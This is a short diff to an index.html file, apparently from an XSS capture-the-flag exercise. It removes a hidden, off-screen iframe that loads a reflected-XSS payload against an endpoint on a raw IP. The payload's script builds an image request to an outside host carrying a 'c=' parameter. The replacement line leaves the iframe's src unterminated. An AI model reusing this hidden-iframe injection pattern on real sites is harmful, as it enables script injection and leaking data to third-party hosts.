--- a/index.html
+++ b/index.html
@@ -1,1 +1,2 @@
-<iframe style="position:absolute;top:-9999px" src="http://54.37.156.50:5000/xss5?name=<script>document.write('<img src=\"https://luisrb85.github.io/RETOXSS5UCLM/c='+encodeURIComponent(alert('XSS'))+'\">')</script>"></iframe>
+<iframe style="position:absolute;top:-9999px" src="http://54.37.156.50:5000/xss5?name=
+</iframe>
